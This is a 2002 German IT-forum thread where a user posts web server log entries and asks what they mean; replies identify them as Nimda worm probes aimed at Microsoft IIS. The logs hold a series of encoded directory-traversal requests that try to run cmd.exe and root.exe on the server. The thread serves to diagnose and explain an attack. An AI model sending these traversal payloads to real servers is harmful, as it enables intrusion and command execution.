Zum Inhalt springen

Empfohlene Beiträge

Geschrieben

Guten Abend :)

seit kurzer Zeit zeigt mir mein Webserver - OmniHTTPd 2.09 unter Windows 98SE - Log-Einträge wie diese:

217.185.99.183 localhost - [06/May/2002:18:11:20 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\root.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:11 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..%2f..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:11 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..S5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..S5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..ÃÅ“..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..À¯..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 412 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..Ã..\winnt\system32\cmd.exe" - Die Pfadangabe ist ungültig.

217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 412 "" ""

Error reading "D:\HTTPD\HTDOCS\msadc\..%5c..\..%5c..\..%5c\..Ã..\..Ã..\..Ã..\winnt\system32\cmd.exe" - Die Pfadangabe ist ungültig.

217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\d\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\c\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\MSADC\root.exe" - Der angegebene Pfad wurde nicht gefunden.

217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 401 "" ""

Error reading "D:\HTTPD\HTDOCS\scripts\root.exe" - Der angegebene Pfad wurde nicht gefunden.

Meine eigene IP ist das garantiert nicht (ein Traceroute auf die IP brachte einen Host mit .se am Ende). Was mir bei der Sache recht spanisch vorkommt, ist, dass der Hacker (?) versucht, erst auf die nicht vorhandene root.exe zuzugreifen, danach versucht, auf die ebenfalls nicht vorhandene cmd.exe zuzugreifen, und dies in sehr schnellen Abständen macht. Hätte ich Windows 2000, könnte das ja CodeRed/Nimda sein, aber ich hab' Windows 98 ... ich habe gestern den Webserver von Port 80 auf Port 1337 gestellt, seitdem ist Ruhe, eine Virensuche mit der aktuellsten Version von AntiVir brachte keine Ergebnisse/Virenfunde.

Was könnte das sein?

tia & bye,

vudman :)

Geschrieben
Original geschrieben von -vudman-

Guten Abend :)

Hätte ich Windows 2000, könnte das ja CodeRed/Nimda sein, aber ich hab' Windows 98 ... ich habe gestern den Webserver von Port 80 auf Port 1337 gestellt, seitdem ist Ruhe, eine Virensuche mit der aktuellsten Version von AntiVir brachte keine Ergebnisse/Virenfunde.

Was könnte das sein?

tia & bye,

vudman :)

Das ist das typischen Angriffsmuster von Nimda. Dieser Wurm versucht von aussen ueber eine Bug im Microsoft IIS Web server in Deinen Rechner einzudringen. Der "Hacker" weiss wahrscheinlich gar nicht, dass eine seiner Maschinen infiziert ist und versucht bei Dir ins System zu kommen. Viel machen kannst Du da nicht (den Port hast Du ja schon geaendert). Eventuell koenntest Du dem Systemandiministrator des infizierten Systems benachrichtigen (.se ist Schweden). Das die Virensuche nichts findet ist klar, da der Virus bei Dir noch nicht im System ist.

Geschrieben

Solange du keinen MS IIS mit bekannter Sicherheitslücke verwendest, gibt es keinen Grund sich sorgen zu machen.

Wie nic schon sagte, weiss die Person, von der diese Anfragen ausgehen vermutlich gar nicht, dass sein Rechner infiziert ist. Desweiteren ist dieser "Angriff" zu 99.9% nichteinmal gezielt gegen deinen PC gerichtet.

Erinnert mich irgendwie an mein Apache Log vor einigen Monaten mit < 170k dieser Einträge :)

Geschrieben

Hi,

vielen Dank für eure Antworten :)

Dachte wirklich, dort würde jemand absichtlich versuchen mich zu hacken, aber wenn dem nicht so ist, freut mich das doch mal :]

Nochmals thx & bye,

vudman :)

Geschrieben

hehe, die gleiche erfahrung mit diesem virus habe ich vor ca. 2 monaten auch gemacht! dachte damals auch das ich von irgendeinem kerl gehackt werde! :D

naja, seitdem die kiste unter slackware läuft und ein vernünftiger apache drauf ist, ist mir das relativ egoool! :)

greets

florum

Geschrieben

Hm wieso hat der Coder von dem Wurm net eine Abfrage eingebaut ob es sich bei dem Webserver um einen IIS handelt? hmmm naja egal.

Fakt is das viele IIS noch diesen Bug haben....

Geschrieben
Original geschrieben von nic_power

Wahrscheinlich geht er davon aus, dass alle Web-Server dieser Welt IIS sind ;).

Nic

Wie man an der Verbreitungsgeschwindigkeit gesehen hat, hat er damit zu 95% auch recht gehabt... warum also unnötig was proggen ? Ihn störts ja auch nicht, wenn auch andere angegriffen werden...:D

Dein Kommentar

Du kannst jetzt schreiben und Dich später registrieren. Wenn Du ein Konto hast, melde Dich jetzt an, um unter Deinem Benutzernamen zu schreiben.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung wiederherstellen

  Nur 75 Emojis sind erlaubt.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Dein vorheriger Inhalt wurde wiederhergestellt.   Editor leeren

×   Du kannst Bilder nicht direkt einfügen. Lade Bilder hoch oder lade sie von einer URL.

Fachinformatiker.de, 2024 by SE Internet Services

fidelogo_small.png

Schicke uns eine Nachricht!

Fachinformatiker.de ist die größte IT-Community
rund um Ausbildung, Job, Weiterbildung für IT-Fachkräfte.

Fachinformatiker.de App

Download on the App Store
Get it on Google Play

Kontakt

Hier werben?
Oder sende eine E-Mail an

Social media u. feeds

Jobboard für Fachinformatiker und IT-Fachkräfte

×
×
  • Neu erstellen...